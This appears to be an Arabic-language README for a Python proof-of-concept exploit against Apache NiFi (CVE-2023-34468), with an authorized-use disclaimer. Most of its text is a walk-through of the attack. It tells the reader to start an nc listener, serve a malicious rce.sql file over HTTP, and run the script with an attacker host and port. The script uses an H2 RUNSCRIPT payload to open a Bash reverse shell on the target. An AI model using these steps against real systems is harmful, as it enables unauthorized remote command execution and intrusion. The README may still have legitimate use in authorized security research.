
CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC
إثبات مفهوم قصير بلغة Python لإساءة استخدام معالج Apache NiFi ExecuteSQL القابل للتحرير باستخدام حمولة H2 RUNSCRIPT لتشغيل تنفيذ الأوامر عن بعد عبر غلاف عكسي Bash.
للاستخدام المصرح به للاختبار والبحث فقط. لا تستخدم ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
ExecuteSQL processor update -> H2 RUNSCRIPT fetch -> Bash reverse shell -> processor restore
--processor-id يدويًا.rce.sql تحدد وتستدعي اسمًا مستعارًا لتنفيذ الغلاف المدعوم بـ Java.nc وخادم HTTP الخاصين بك.rce.sql عبر H2 RUNSCRIPT.



git clone https://github.com/ozcanpng/CVE-2023-34468.git
cd CVE-2023-34468
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
الطرفية 1:
rlwrap nc -lvnp 4444
الطرفية 2، من دليل هذا المستودع:
python3 -m http.server 8000
الطرفية 3:
python3 CVE-2023-34468.py --url http://flow.helix.htb --lhost 10.10.16.53 --lport 4444
لاختيار المعالج يدويًا:
python3 CVE-2023-34468.py --url http://flow.helix.htb --processor-id <UUID> --lhost 10.10.16.53 --lport 4444
| المنتج | الإصدار المتأثر | الوصول المطلوب | التأثير |
|---|---|---|---|
| Apache NiFi | التوزيعات المتأثرة بـ CVE-2023-34468 باستخدام سلوك ExecuteSQL/H2 القابل للتحرير | القدرة على الوصول إلى معالج NiFi الهدف وتعديله عبر API | تنفيذ الأوامر عن بعد |
rce.sql المُنشأ بواسطة git ويجب تقديمه من دليل المستودع باستخدام python3 -m http.server.--processor-id.ozcanpng — github.com/ozcanpng — ozcanpng.dev